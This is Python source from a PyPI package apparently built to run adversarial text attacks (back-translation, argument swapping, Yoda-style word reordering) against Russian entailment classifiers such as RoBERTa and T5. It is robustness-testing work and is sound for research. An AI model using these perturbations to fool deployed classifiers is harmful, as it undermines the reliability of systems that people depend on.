input_ids=batch["input_ids"].to(self.device),
attention_mask=batch["attention_mask"].to(self.device)
).logits.argmax(-1).tolist()
preds.extend(x)
return sum([p == t for p, t in zip(preds, targets)]) / len(targets) | /ru_attacker-0.0.5-py3-none-any.whl/ru_attacker/models/Roberta_model.py | 0.770206 | 0.312816 | Roberta_model.py | pypi |
from transformers import T5Tokenizer, T5ForConditionalGeneration
from typing import List, Dict
from .basic_model import BasicModel
import torch
from torch.utils.data import Dataset, DataLoader
import re
import jsonlines
import tqdm
__all__ = ["T5Model"]
class T5Dataset(Dataset):
    """Thin torch Dataset wrapper around a pre-built list of items."""

    def __init__(self, items):
        super().__init__()
        self.items = items

    def __getitem__(self, index):
        """Return the pre-built item at *index* unchanged."""
        return self.items[index]

    def __len__(self):
        """Number of items in the dataset."""
        return len(self.items)
class T5Collator:
    """Collates a batch of variable-length examples by right-padding every
    sequence to the batch's longest ``input_ids`` length."""

    def __init__(self, pad_token_id):
        self.pad_token_id = pad_token_id

    def __call__(self, batch: List[Dict[str, List[int]]]) -> Dict[str, torch.Tensor]:
        longest = max(len(example["input_ids"]) for example in batch)

        def pad_to(values, fill):
            # Right-pad *values* with *fill* up to the batch maximum.
            return torch.tensor(values + [fill] * (longest - len(values)))

        return {
            "input_ids": torch.stack(
                [pad_to(example["input_ids"], self.pad_token_id) for example in batch]),
            "attention_mask": torch.stack(
                [pad_to(example["attention_mask"], 0) for example in batch]),
        }
class T5Model(BasicModel):
def __init__(self, model_dir):
    """Load a T5 conditional-generation model and tokenizer from *model_dir*,
    move the model to ``self.device`` (set by BasicModel) and put it in
    eval mode."""
    super().__init__()
    self.model = T5ForConditionalGeneration.from_pretrained(model_dir)
    self.model.to(self.device).eval()
    self.tokenizer = T5Tokenizer.from_pretrained(model_dir)
    # Maximum encoded sequence length used by prepare_data/_tokenize.
    self.max_len = 200
def prepare_data(self, premise, hypothesis):
    """Build the TERRa text-to-text prompt for one pair and encode it,
    right-padding input_ids/attention_mask to ``self.max_len``."""
    inputs = ["terra посылка: " + premise + " гипотеза: " + hypothesis]
    res = self.tokenizer.batch_encode_plus(
        inputs,
        return_attention_mask=False,
        max_length=self.max_len,
        truncation=True
    )
    # Manual right-padding with pad_token_id; mask is 1 over real tokens.
    return {
        "input_ids": torch.tensor(
            res["input_ids"][0] + [self.tokenizer.pad_token_id] * (self.max_len - len(res["input_ids"][0]))),
        "attention_mask": torch.tensor(
            [1] * len(res["input_ids"][0]) + [0] * (self.max_len - len(res["input_ids"][0]))),
    }
@staticmethod
def postprocess(s):
s = s.replace("<pad>", "")
s = s.replace("</s>", "")
s = re.sub("\s+", " ", s)
s = s.strip()
return s
def predict(self, inputs):
    """Greedy-decode one prepared input and map the decoded text to a label.

    Returns 1 for "следует", 0 for "не следует".
    NOTE(review): returns ``False`` (not an int label) when the first
    decoded string matches neither key — callers comparing with ``==``
    will treat it like 0; confirm this fallback is intended.
    """
    di = {"следует": 1, "не следует": 0}
    with torch.no_grad():
        x = self.model.generate(
            input_ids=inputs["input_ids"].reshape((1, -1)).to(self.device),
            attention_mask=inputs["attention_mask"].reshape((1, -1)).to(self.device),
            max_length=16,
            do_sample=False,
            num_beams=1
        )
        preds_i = self.tokenizer.batch_decode(x.to("cpu"))
        # Only the first decoded string is ever inspected: both branches return.
        for p in preds_i:
            p = self.postprocess(p)
            if p in di:
                return di[p]
            else:
                return False
def validate(self, filename):
    """Compute accuracy of the model over a TERRa jsonlines file.

    Decoded predictions are compared as strings against the Russian
    target labels produced by :meth:`_get_data`.
    """
    data = self._get_data(filename)
    data_ids = self._tokenize(data)
    collator = T5Collator(pad_token_id=self.tokenizer.pad_token_id)
    ds_test = T5Dataset(self._get_items(data_ids))
    loader = DataLoader(ds_test, batch_size=8, collate_fn=collator)
    targets = [i["targets"] for i in data]
    preds = []
    with torch.no_grad():
        for batch in tqdm.tqdm(loader):
            x = self.model.generate(
                input_ids=batch["input_ids"].to(self.device),
                attention_mask=batch["attention_mask"].to(self.device),
                max_length=16,
                do_sample=False,
                num_beams=1
            )
            preds_i = self.tokenizer.batch_decode(x.to("cpu"))
            for p in preds_i:
                p = self.postprocess(p)
                preds.append(p)
    # Fraction of exact string matches between predictions and targets.
    return sum([p == t for p, t in zip(preds, targets)])/len(targets)
@staticmethod
def _get_data(filename):
    """Read a TERRa jsonlines file into prompt/target dicts.

    Each record becomes ``{"idx", "inputs", "targets"}`` where the label
    is mapped to its Russian text form for text-to-text training.
    """
    data = []
    di = {"entailment": "следует", "not_entailment": "не следует"}
    with jsonlines.open(filename) as reader:
        for obj in reader:
            idx = obj["idx"]
            inputs = "terra посылка: " + obj["premise"] + " гипотеза: " + obj["hypothesis"]
            output = di[obj["label"]]
            data.append({"idx": idx, "inputs": inputs, "targets": output})
    return data
def _tokenize(self, data):
    """Batch-encode the "inputs" (and, when present, "targets") strings of
    *data*, truncating to ``self.max_len``; target ids are stored under
    the extra key ``target_ids``."""
    inputs = []
    targets = []
    for x in data:
        inputs.append(x["inputs"])
        if "targets" in x:
            targets.append(x["targets"])
    res = self.tokenizer.batch_encode_plus(
        inputs,
        return_attention_mask=False,
        max_length=self.max_len,
        truncation=True
    )
    if len(targets) != 0:
        # Either every record has a target or none does.
        assert len(targets) == len(inputs)
        res["target_ids"] = self.tokenizer.batch_encode_plus(
            targets,
            return_attention_mask=False,
            max_length=self.max_len,
            truncation=True
        )["input_ids"]
    return res
@staticmethod
def _get_items(ids):
items = []
for i in range(len(ids["input_ids"])):
item = {
"input_ids": ids["input_ids"][i],
"attention_mask": [1] * len(ids["input_ids"][i]),
}
items.append(item)
return items | /ru_attacker-0.0.5-py3-none-any.whl/ru_attacker/models/T5_model.py | 0.823364 | 0.323487 | T5_model.py | pypi |
from abc import ABC, abstractmethod
import language_tool_python
import numpy as np
import tensorflow_hub as hub
import tensorflow_text
__all__ = ["BasicAttack"]
# Heavyweight module-level side effects: the multilingual Universal Sentence
# Encoder and LanguageTool are loaded when this module is imported.
# NOTE(review): consider lazy initialisation — importing this module pays the
# full load cost even if no attack is ever run.
embed = hub.load("https://tfhub.dev/google/universal-sentence-encoder-multilingual/3")
tool = language_tool_python.LanguageTool('ru-RU')
class BasicAttack(ABC):
"""
A basic class for attacks
"""
@abstractmethod
def attack(self, model, dataset):
    """
    A method to attack models. Subclasses must implement it (typically
    wrapped with :meth:`attack_decorator`).

    :param model: a model to attack
    :param dataset: a dataset on which the attack is performed
    :return: results, "status of attack", correct_attack
    """
    pass
@staticmethod
def print_results(results):
"""
A method to print results
:param results: results dictionary
:return: None
"""
di = {1: "entailment", 0: "not_entailment"}
if results["attacked label"][-1] != None:
print(f"""
[Succeeded / Failed / Skipped / Total] {results["attack"].count("succeeded")} / {results["attack"].count("failed")} / {results["attack"].count("skipped")} / {len(results["attack"])}:
{di[results["original label"][-1]]} --> {di[results["attacked label"][-1]]}
original premise: {results["original premise"][-1]}
original hypothesis: {results["original hypothesis"][-1]}
transformed: {results["transformed"][-1]}
""")
else:
print(f"""
[Succeeded / Failed / Skipped / Total] {results["attack"].count("succeeded")} / {results["attack"].count("failed")} / {results["attack"].count("skipped")} / {len(results["attack"])}:
{di[results["original label"][-1]]} --> Skipped
""")
@staticmethod
def predict_after_transform_hypothesis(model, premise, transformed, results):
"""
A method to make prediction after a transformation
:param model: attacked model
:param premise: premise
:param transformed: transformed hypothesis
:param results: results dictionary
:return: prediction, results
"""
prediction = model.predict(model.prepare_data(premise, transformed))
results["attacked label"].append(prediction)
results["transformed"].append(transformed)
return prediction, results
@staticmethod
def predict_after_transform_premise(model, hypothesis, transformed, results):
"""
A method to make prediction after a transformation
:param model: attacked model
:param hypothesis: hypothesis
:param transformed: transformed premise
:param results: results dictionary
:return: prediction, results
"""
prediction = model.predict(model.prepare_data(transformed, hypothesis))
results["attacked label"].append(prediction)
results["transformed"].append(transformed)
return prediction, results
@staticmethod
def attack_decorator(func):
    """
    A decorator for attack functions: iterates the dataset, skips samples
    the model already misclassifies, delegates each correctly-classified
    sample to *func*, and tallies accuracy before/after the attack.

    :param func: attack function with signature
        (self, results, model, premise, hypothesis, label, correct_attack)
        returning (results, attack_status, correct_attack)
    :return: results
    """
    def wrapper(self, model, dataset):
        results = {
            "original label": [],
            "attacked label": [],
            "original premise": [],
            "original hypothesis": [],
            "transformed": [],
            "attack": [],
        }
        total = 0
        correct = 0
        correct_attack = 0
        for i, row in dataset.iterrows():
            total += 1
            premise = row["premise"]
            hypothesis = row["hypothesis"]
            label = row["label"]
            prediction = model.predict(model.prepare_data(premise, hypothesis))
            # Only samples the model gets right are worth attacking.
            if label == prediction:
                correct += 1
                results["original premise"].append(premise)
                results["original hypothesis"].append(hypothesis)
                results["original label"].append(label)
                results, attack, correct_attack = func(self, results, model, premise, hypothesis, label, correct_attack)
                if attack == "succeeded":
                    results["attack"].append("succeeded")
                elif attack == "skipped":
                    # Skipped samples still count as correct after the attack.
                    correct_attack += 1
                    results["transformed"].append(None)
                    results["attacked label"].append(None)
                    results["attack"].append("skipped")
                elif attack == "failed":
                    results["attack"].append("failed")
                self.print_results(results)
        print(
            f"Accuracy before attack {round(correct / total, 2)} --> Accuracy after attack {round(correct_attack / total, 2)}"
        )
        print(f"Success rate {round(results['attack'].count('succeeded') / len(results['attack']), 2)}")
        return results
    return wrapper
@staticmethod
def check_grammar(text):
    """
    A grammar constraint.

    :param text: text to check
    :return: True when LanguageTool reports no GRAMMAR-category issue,
        False otherwise
    """
    return not any(m.category == "GRAMMAR" for m in tool.check(text))
@staticmethod
def check_semantics(original, transformed):
"""
A semantics constraint
:param original: original text
:param transformed: transformed text
:return: True or False
"""
score = np.inner(embed(original), embed(transformed))
if score >= 0.8:
return True
else:
return False | /ru_attacker-0.0.5-py3-none-any.whl/ru_attacker/attacks/basic_attack.py | 0.882377 | 0.454351 | basic_attack.py | pypi |
from .basic_attack import BasicAttack
from transformers import M2M100ForConditionalGeneration, M2M100Tokenizer
import torch
import random
__all__ = ["BackTranslation"]
class BackTranslation(BasicAttack):
def __init__(self, languages=None):
    """Load the M2M100 translation model/tokenizer (source language fixed
    to Russian) and store the pivot languages used for back-translation.

    :param languages: optional list of ISO language codes; defaults to a
        built-in mix of European/Slavic languages.
    """
    if torch.cuda.is_available():
        self.device = "cuda"
    else:
        self.device = "cpu"
    self.model = M2M100ForConditionalGeneration.from_pretrained("facebook/m2m100_418M")
    self.tokenizer = M2M100Tokenizer.from_pretrained("facebook/m2m100_418M")
    self.tokenizer.src_lang = "ru"
    self.model.to(self.device)
    if languages:
        self.languages = languages
    else:
        self.languages = ["es", "en", "fr", "de", "pt", "bs", "be", "uk", "bg", "hr", "cs", "mk", "pl", "sr", "sk", "sl"]
@BasicAttack.attack_decorator
def attack(self, results, model, premise, hypothesis, label, correct_attack):
    """Try back-translating the hypothesis through shuffled pivot languages.

    Returns "succeeded" on the first pivot that flips the prediction while
    passing the semantics and grammar constraints; "failed" with the last
    valid candidate if none flips it; "skipped" if no candidate passed the
    constraints at all.

    NOTE(review): ``random.shuffle(self.languages)`` mutates shared
    instance state on every call — confirm intended.
    """
    last = None
    random.shuffle(self.languages)
    for lang in self.languages:
        transformed = self.translate_back(lang, hypothesis)
        # Candidates must stay semantically close and grammatical.
        if not self.check_semantics(hypothesis, transformed) or not self.check_grammar(transformed):
            continue
        prediction = model.predict(model.prepare_data(premise, transformed))
        if label != prediction:
            results["attacked label"].append(prediction)
            results["transformed"].append(transformed)
            return results, "succeeded", correct_attack
        else:
            last = transformed
    if last:
        results["attacked label"].append(label)
        results["transformed"].append(last)
        correct_attack += 1
        return results, "failed", correct_attack
    else:
        return results, "skipped", correct_attack
def translate_back(self, target_lang, text):
encoded_ru = self.tokenizer(text, return_tensors="pt")
generated_tokens = self.model.generate(**encoded_ru.to(self.device),
forced_bos_token_id=self.tokenizer.get_lang_id(target_lang))
translation = self.tokenizer.batch_decode(generated_tokens, skip_special_tokens=True)
self.tokenizer.src_lang = target_lang
encoded_uk = self.tokenizer(translation, return_tensors="pt")
generated_tokens = self.model.generate(**encoded_uk.to(self.device),
forced_bos_token_id=self.tokenizer.get_lang_id("ru"))
back_translation = self.tokenizer.batch_decode(generated_tokens, skip_special_tokens=True)
return back_translation[0] | /ru_attacker-0.0.5-py3-none-any.whl/ru_attacker/attacks/backtranslation.py | 0.612078 | 0.189409 | backtranslation.py | pypi |
class Attack:
"""
A wrapper for attacks
"""
def __init__(self, transformation, goal_function, type_perturbation, constraints=None, search_method=None):
"""
It contains of four main components and a type of perturbation which is required for the RTE task
:param transformation: an obligatory component, type of transformation
:param goal_function: an obligatory component, type of goal function
:param type_perturbation: an obligatory component, to what part the perturbation is applied
:param constraints: a facultative component, constraints to filter samples
:param search_method: a facultative component, a method to find attack
"""
self.transformation = transformation
self.goal_function = goal_function
self.constraints = constraints
self.search_method = search_method
self.type_perturbation = type_perturbation
    def attack(self, model, dataset):
        """
        a method to attack models
        :param model: model to attack (must provide predict() and prepare_data())
        :param dataset: dataset on which the attack is performed
            (pandas-style, iterated via iterrows with "premise",
            "hypothesis" and "label" columns)
        :return: results of attack
        """
        # Parallel lists, one entry per attacked sample; samples the model
        # misclassifies up front never appear here.
        results = {
            "original label": [],
            "attacked label": [],
            "original premise": [],
            "original hypothesis": [],
            "transformed": [],
        "attack": [],
        }
        total = 0            # samples seen
        correct = 0          # correctly classified before the attack
        correct_attack = 0   # still correctly classified after the attack
        for i, row in dataset.iterrows():
            total += 1
            premise = row["premise"]
            hypothesis = row["hypothesis"]
            label = row["label"]
            prediction = model.predict(model.prepare_data(premise, hypothesis))
            # Only attack samples the model already classifies correctly;
            # misclassified ones are silently ignored.
            if label == prediction:
                correct += 1
                results["original premise"].append(premise)
                results["original hypothesis"].append(hypothesis)
                results["original label"].append(label)
                if self.type_perturbation == "hypothesis":
                    transformations = self.transformation.transform(hypothesis)
                elif self.type_perturbation == "premise":
                    transformations = self.transformation.transform(premise)
                else:
                    raise TypeError("Transformations only to hypothesis and premise are supported")
                if self.search_method:
                    # Delegate candidate selection to the configured search method.
                    result, transformation, prediction = self.search_method.search(
                        premise, hypothesis, label, transformations,
                        self.goal_function, self.type_perturbation, model, self.constraints
                    )
                    if result == "skipped":
                        # Every candidate rejected: counts as "model not fooled".
                        correct_attack += 1
                        results["transformed"].append(None)
                        results["attacked label"].append(None)
                        results["attack"].append("skipped")
                        self.print_results(results)
                        continue
                    results["attacked label"].append(prediction)
                    results["transformed"].append(transformation)
                    if label == prediction:
                        correct_attack += 1
                    if result == "succeeded":
                        results["attack"].append("succeeded")
                    else:
                        results["attack"].append("failed")
                    self.print_results(results)
                    continue
                # No search method: try only the first candidate.
                # NOTE(review): raises IndexError if transform() returned an
                # empty list -- confirm transformations are never empty.
                transformation = transformations[0]
                if self.type_perturbation == "hypothesis":
                    valid, results = self.check(hypothesis, transformation, results)
                else:
                    valid, results = self.check(premise, transformation, results)
                if not valid:
                    # Rejected by constraints; check() already logged "skipped".
                    correct_attack += 1
                    self.print_results(results)
                    continue
                if self.type_perturbation == "hypothesis":
                    prediction = model.predict(model.prepare_data(premise, transformation))
                elif self.type_perturbation == "premise":
                    prediction = model.predict(model.prepare_data(transformation, hypothesis))
                if label == prediction:
                    correct_attack += 1
                results["attacked label"].append(prediction)
                results["transformed"].append(transformation)
                if self.goal_function.success(label, prediction):
                    results["attack"].append("succeeded")
                else:
                    results["attack"].append("failed")
                self.print_results(results)
        # NOTE(review): both summaries divide unguarded -- an empty dataset
        # (total == 0) or a run with no attacked samples
        # (len(results["attack"]) == 0) raises ZeroDivisionError.
        print(
            f"Accuracy before attack {round(correct / total, 2)} --> Accuracy after attack {round(correct_attack / total, 2)}"
        )
        print(f"Success rate {round(results['attack'].count('succeeded') / len(results['attack']), 2)}")
        return results
def check(self, original, transformation, results):
if self.constraints:
for constraint in self.constraints:
if not constraint.check(original, transformation):
results["transformed"].append(None)
results["attacked label"].append(None)
results["attack"].append("skipped")
return False, results
return True, results
    @staticmethod
    def print_results(results):
        """
        A method to print the running attack statistics and the last sample.
        :param results: results dictionary (see attack() for the expected keys)
        :return: None
        """
        # Integer label -> human-readable RTE label name.
        di = {1: "entailment", 0: "not_entailment"}
        # NOTE(review): prefer "is not None" over "!= None" (PEP 8 / E711).
        if results["attacked label"][-1] != None:
            print(f"""
            [Succeeded / Failed / Skipped / Total] {results["attack"].count("succeeded")} / {results["attack"].count("failed")} / {results["attack"].count("skipped")} / {len(results["attack"])}:
            {di[results["original label"][-1]]} --> {di[results["attacked label"][-1]]}
            original premise: {results["original premise"][-1]}
            original hypothesis: {results["original hypothesis"][-1]}
            transformed: {results["transformed"][-1]}
            """)
        else:
            print(f"""
            [Succeeded / Failed / Skipped / Total] {results["attack"].count("succeeded")} / {results["attack"].count("failed")} / {results["attack"].count("skipped")} / {len(results["attack"])}:
            {di[results["original label"][-1]]} --> Skipped
""") | /ru_attacker-0.0.5-py3-none-any.whl/ru_attacker/attacks/attack.py | 0.797162 | 0.713637 | attack.py | pypi |
from natasha import (
Segmenter,
NewsEmbedding,
NewsSyntaxParser,
Doc
)
from .basic_attack import BasicAttack
__all__ = ["YodaStyle"]
class YodaStyle(BasicAttack):
    # Attack that fronts the direct object of the hypothesis ("Yoda speak")
    # and checks whether the model changes its prediction.
    def __init__(self):
        self.segmenter = Segmenter()
        self.syntax_parser = NewsSyntaxParser(NewsEmbedding())
    @BasicAttack.attack_decorator
    def attack(self, results, model, premise, hypothesis, label, correct_attack):
        """Apply the Yoda-style reordering to *hypothesis* and re-classify.

        Returns ``(results, status, correct_attack)`` where status is
        "skipped" (no reordering possible), "failed" (prediction unchanged)
        or "succeeded" (prediction flipped).
        """
        transformed = self.yoda_style(hypothesis)
        if hypothesis == transformed:
            # Nothing was reordered -> nothing to attack.
            return results, "skipped", correct_attack
        prediction, results = self.predict_after_transform_hypothesis(model, premise, transformed, results)
        if label == prediction:
            correct_attack += 1
            return results, "failed", correct_attack
        else:
            return results, "succeeded", correct_attack
    def yoda_style(self, text):
        """Front the direct object: "<obj phrase> <subj phrase> <rest>".

        Returns *text* unchanged when no subject/object pair is found.
        """
        def find_children(parent_id, children, tokens):
            # Depth-first collection of the whole dependency subtree of
            # parent_id into *children* (a list of token ids).
            # token = tokens[int(parent_id[-1]) - 1]
            for tok in tokens:
                if tok.head_id == parent_id:
                    children = find_children(tok.id, children, tokens)
                    # NOTE(review): this guard can only trigger via the bare
                    # "return" below itself, so it looks unreachable; also
                    # "== None" should be "is None" (PEP 8).
                    if children == None:
                        return
                    children.append(tok.id)
            return children
        def get_args(arg, tokens):
            # Surface text of the subtree headed by *arg*, plus its token ids.
            args = find_children(arg, [arg], tokens)
            children = []
            for token in tokens:
                if token.id in args:
                    children.append(token.text)
            return " ".join(children), args
        doc = Doc(text)
        doc.segment(self.segmenter)
        doc.parse_syntax(self.syntax_parser)
        root = None
        idx = []   # ids of tokens consumed by the subject/object phrases
        tokens = doc.tokens
        subj = None
        obj = None
        # The first root/csubj token is taken as the sentence head.
        for token in tokens:
            if token.rel in ["root", "csubj"] and not root:
                root = token.id
        if root:
            for token in tokens:
                if token.head_id == root:
                    if token.rel == "nsubj":
                        subj, args = get_args(token.id, tokens)
                        idx.extend(args)
                    elif token.rel == "obj":
                        obj, args = get_args(token.id, tokens)
                        idx.extend(args)
        if subj and obj:
            # Object first (capitalised), then subject, then the remainder
            # of the sentence in original order.
            sent = [obj.capitalize(), subj.lower()]
            sent.extend([t.text for t in tokens if t.id not in idx])
            return " ".join(sent)
        else:
            return text
return text | /ru_attacker-0.0.5-py3-none-any.whl/ru_attacker/attacks/yoda_style.py | 0.548674 | 0.286169 | yoda_style.py | pypi |
from natasha import (
Segmenter,
NewsEmbedding,
NewsSyntaxParser,
Doc
)
from .basic_attack import BasicAttack
import pymorphy2
__all__ = ["ChangeArguments"]
class ChangeArguments(BasicAttack):
    # Attack that permutes the root verb's arguments (subject / objects /
    # obliques), re-inflecting each word into the case of its new slot.
    def __init__(self):
        self.morph = pymorphy2.MorphAnalyzer()
        self.segmenter = Segmenter()
        self.syntax_parser = NewsSyntaxParser(NewsEmbedding())
    @BasicAttack.attack_decorator
    def attack(self, results, model, premise, hypothesis, label, correct_attack):
        """Permute the hypothesis' arguments and re-classify.

        NOTE(review): unlike other attacks, "succeeded"/"failed" here is
        decided by the new prediction being 1 (entailment), not by the
        prediction flipping -- confirm this matches the intended goal
        function for this attack.
        """
        transformed = self.change_args(hypothesis)
        if hypothesis == transformed:
            return results, "skipped", correct_attack
        prediction, results = self.predict_after_transform_hypothesis(model, premise, transformed, results)
        if label == prediction:
            correct_attack += 1
        if prediction == 1:
            return results, "succeeded", correct_attack
        else:
            return results, "failed", correct_attack
    def change_args(self, text):
        """Return *text* with the root verb's argument words permuted.

        Each moved word is re-inflected into the grammatical case of the
        slot it lands in; the input is returned unchanged when fewer than
        two arguments are found.
        """
        def inflect(word, case):
            # Inflect a pymorphy2 parse into *case*; fall back to the
            # original form when the case is unknown or inflection fails.
            if not case:
                return word.word
            w = word.inflect({case})
            if w:
                return w.word
            else:
                return word.word
        doc = Doc(text)
        doc.segment(self.segmenter)
        doc.parse_syntax(self.syntax_parser)
        root = None
        args = {}   # token id -> token, later replaced by the new word form
        idx = []    # argument token ids in sentence order
        for token in doc.tokens:
            if token.rel in ["root", "csubj"] and not root:
                root = token.id
        if root:
            for token in doc.tokens:
                if token.head_id == root and token.rel in ["nsubj", "obj", "iobj", "obl"]:
                    args[token.id] = token
                    idx.append(token.id)
        if len(idx) < 2:
            return text
        if len(idx) % 2 == 0:
            # Even count: swap the arguments pairwise; each word takes over
            # the case of the slot it moves into.
            for i in range(0, len(idx), 2):
                first = self.morph.parse(args[idx[i]].text)[0]
                second = self.morph.parse(args[idx[i + 1]].text)[0]
                case_first = first.tag.case
                case_second = second.tag.case
                new_first = inflect(first, case_second)
                new_second = inflect(second, case_first)
                args[idx[i]] = new_second
                args[idx[i + 1]] = new_first
        else:
            # Odd count: rotate the first three arguments, then swap any
            # remaining ones pairwise.
            first = self.morph.parse(args[idx[0]].text)[0]
            second = self.morph.parse(args[idx[1]].text)[0]
            third = self.morph.parse(args[idx[2]].text)[0]
            case_first = first.tag.case
            case_second = second.tag.case
            case_third = third.tag.case
            new_first = inflect(first, case_third)
            new_second = inflect(second, case_first)
            new_third = inflect(third, case_second)
            args[idx[0]] = new_second
            args[idx[1]] = new_third
            args[idx[2]] = new_first
            if len(idx) > 3:
                for i in range(3, len(idx), 2):
                    first = self.morph.parse(args[idx[i]].text)[0]
                    second = self.morph.parse(args[idx[i + 1]].text)[0]
                    case_first = first.tag.case
                    case_second = second.tag.case
                    new_first = inflect(first, case_second)
                    new_second = inflect(second, case_first)
                    args[idx[i]] = new_second
                    args[idx[i + 1]] = new_first
        # Reassemble: permuted forms for argument slots, original text elsewhere.
        sentence = [args[token.id] if token.id in idx else token.text for token in doc.tokens]
        return " ".join(sentence)
return " ".join(sentence) | /ru_attacker-0.0.5-py3-none-any.whl/ru_attacker/attacks/change_arguments.py | 0.485844 | 0.30905 | change_arguments.py | pypi |
from .basic_transformation import BasicTransformation
import pymorphy2
from natasha import (
Segmenter,
NewsEmbedding,
NewsSyntaxParser,
Doc
)
__all__ = ["ChangeArguments"]
class ChangeArguments(BasicTransformation):
    # Transformation that permutes the root verb's arguments (subject /
    # objects / obliques), re-inflecting each word into the case of its
    # new slot.  Returns a one-element candidate list (transformation API).
    def __init__(self):
        self.morph = pymorphy2.MorphAnalyzer()
        self.segmenter = Segmenter()
        self.syntax_parser = NewsSyntaxParser(NewsEmbedding())
    def transform(self, text):
        """Return ``[text-with-permuted-arguments]``.

        Falls back to ``[text]`` unchanged when fewer than two arguments
        of the root verb are found.
        """
        doc = Doc(text)
        doc.segment(self.segmenter)
        doc.parse_syntax(self.syntax_parser)
        root = None
        args = {}   # token id -> token, later replaced by the new word form
        idx = []    # argument token ids in sentence order
        for token in doc.tokens:
            if token.rel in ["root", "csubj"] and not root:
                root = token.id
        if root:
            for token in doc.tokens:
                if token.head_id == root and token.rel in ["nsubj", "obj", "iobj", "obl"]:
                    args[token.id] = token
                    idx.append(token.id)
        if len(idx) < 2:
            return [text]
        if len(idx) % 2 == 0:
            # Even count: swap the arguments pairwise; each word takes over
            # the case of the slot it moves into.
            for i in range(0, len(idx), 2):
                first = self.morph.parse(args[idx[i]].text)[0]
                second = self.morph.parse(args[idx[i + 1]].text)[0]
                case_first = first.tag.case
                case_second = second.tag.case
                new_first = self.inflect(first, case_second)
                new_second = self.inflect(second, case_first)
                args[idx[i]] = new_second
                args[idx[i + 1]] = new_first
        else:
            # Odd count: rotate the first three arguments, then swap any
            # remaining ones pairwise.
            first = self.morph.parse(args[idx[0]].text)[0]
            second = self.morph.parse(args[idx[1]].text)[0]
            third = self.morph.parse(args[idx[2]].text)[0]
            case_first = first.tag.case
            case_second = second.tag.case
            case_third = third.tag.case
            new_first = self.inflect(first, case_third)
            new_second = self.inflect(second, case_first)
            new_third = self.inflect(third, case_second)
            args[idx[0]] = new_second
            args[idx[1]] = new_third
            args[idx[2]] = new_first
            if len(idx) > 3:
                for i in range(3, len(idx), 2):
                    first = self.morph.parse(args[idx[i]].text)[0]
                    second = self.morph.parse(args[idx[i + 1]].text)[0]
                    case_first = first.tag.case
                    case_second = second.tag.case
                    new_first = self.inflect(first, case_second)
                    new_second = self.inflect(second, case_first)
                    args[idx[i]] = new_second
                    args[idx[i + 1]] = new_first
        # Reassemble: permuted forms for argument slots, original text elsewhere.
        sentence = [args[token.id] if token.id in idx else token.text for token in doc.tokens]
        return [" ".join(sentence)]
    @staticmethod
    def inflect(word, case):
        # Inflect a pymorphy2 parse into *case*; fall back to the original
        # form when the case is unknown or inflection fails.
        if not case:
            return word.word
        w = word.inflect({case})
        if w:
            return w.word
        else:
return word.word | /ru_attacker-0.0.5-py3-none-any.whl/ru_attacker/attacks/transformations/change_arguments.py | 0.433022 | 0.216695 | change_arguments.py | pypi |
import re
from abc import ABC, abstractmethod
import pymorphy2
class Soundex(ABC):
    """Generic, configurable Soundex coder.

    Subclasses provide the language-specific alphabet via the class
    attributes ``_vowels`` (vowel letters), ``_table`` (consonant-to-digit
    translation) and ``_vowels_table`` (vowel grouping used when
    ``code_vowels`` is enabled), and implement :meth:`transform`.
    """
    _vowels = ''
    _table, _vowels_table = str.maketrans('', ''), str.maketrans('', '')
    # Collapses runs of the same character ("nn" -> "n").
    _reduce_regex = re.compile(r'(\w)(\1)+', re.IGNORECASE)
    # Matches runs of '0', the placeholder used for vowels.
    _vowels_regex = re.compile(r'(0+)', re.IGNORECASE)

    def __init__(self, delete_first_letter=False, delete_first_coded_letter=False,
                 delete_zeros=False, code_vowels=False, cut_result=False, seq_cutted_len=4):
        """
        Initialization of Soundex object
        :param delete_first_letter: remove the first letter from the result code (A169 -> 169)
        :param delete_first_coded_letter: remove the first coded letter from the result code (A0169 -> A169)
        :param delete_zeros: remove vowels from the result code
        :param code_vowels: group and code vowels as ABC letters
        :param cut_result: cut result code till N symbols
        :param seq_cutted_len: length of the result code
        """
        self.delete_first_letter = delete_first_letter
        self.delete_first_coded_letter = delete_first_coded_letter
        self.delete_zeros = delete_zeros
        self.code_vowels = code_vowels
        self.cut_result = cut_result
        self.seq_cutted_len = seq_cutted_len

    def _is_vowel(self, letter):
        """Return True if *letter* is one of this language's vowels."""
        return letter in self._vowels

    def _reduce_seq(self, seq):
        """Collapse consecutive duplicate characters into one."""
        return self._reduce_regex.sub(r'\1', seq)

    def _translate_vowels(self, word):
        """Replace vowels with group letters (code_vowels) or with '0'."""
        if self.code_vowels:
            return word.translate(self._vowels_table)
        else:
            return ''.join('0' if self._is_vowel(letter) else letter for letter in word)

    def _remove_vowels_and_paired_sounds(self, seq):
        """Drop vowel placeholders and re-collapse adjacent duplicates."""
        seq = self._vowels_regex.sub('', seq)
        seq = self._reduce_seq(seq)
        return seq

    def _apply_soundex_algorithm(self, word):
        """Run the configured Soundex pipeline over *word*.

        Bug fix: returns '' for empty input instead of raising IndexError
        (the original unconditionally read ``word[0]``).
        """
        if not word:
            return ''
        word = word.lower()
        first, last = word[0], word
        last = last.translate(self._table)      # consonants -> digit groups
        last = self._translate_vowels(last)
        last = self._reduce_seq(last)
        if self.delete_zeros:
            last = self._remove_vowels_and_paired_sounds(last)
        if self.cut_result:
            # Truncate to the configured length, then right-pad with zeros.
            last = last[:self.seq_cutted_len]
            last += '0' * (self.seq_cutted_len - len(last))
        if self.delete_first_coded_letter:
            last = last[1:]
        first_char = '' if self.delete_first_letter else first.capitalize()
        return first_char + last.upper()

    def get_vowels(self):
        """Return the vowel letters used by this coder."""
        return self._vowels

    def is_delete_first_coded_letter(self):
        return self.delete_first_coded_letter

    def is_delete_first_letter(self):
        return self.delete_first_letter

    @abstractmethod
    def transform(self, word):
        """
        Converts a given word to Soundex code
        :param word: string
        :return: Soundex string code
        """
        return None
class EnglishSoundex(Soundex):
    """
    This version may have differences from original Soundex for English
    (consonants were split into more groups)
    """
    # 'h' and 'w' are dropped entirely before coding.
    _hw_replacement = re.compile(r'[hw]', re.IGNORECASE)
    # Vowel digraph/ending patterns used only in code_vowels mode.
    _au_ending = re.compile(r'au', re.IGNORECASE)
    _ea_ending = re.compile(r'e[ae]', re.IGNORECASE)
    _oo_ue_ew_ending = re.compile(r'(ew|ue|oo)', re.IGNORECASE)
    _iey_ending = re.compile(r'([ie]y|ai)', re.IGNORECASE)
    _iye_ire_ending = re.compile(r'([iy]e|[iy]re)$', re.IGNORECASE)
    _ye_ending = re.compile(r'^ye', re.IGNORECASE)
    _ere_ending = re.compile(r'(e[ae]r|ere)$', re.IGNORECASE)
    _vowels = 'aeiouy'
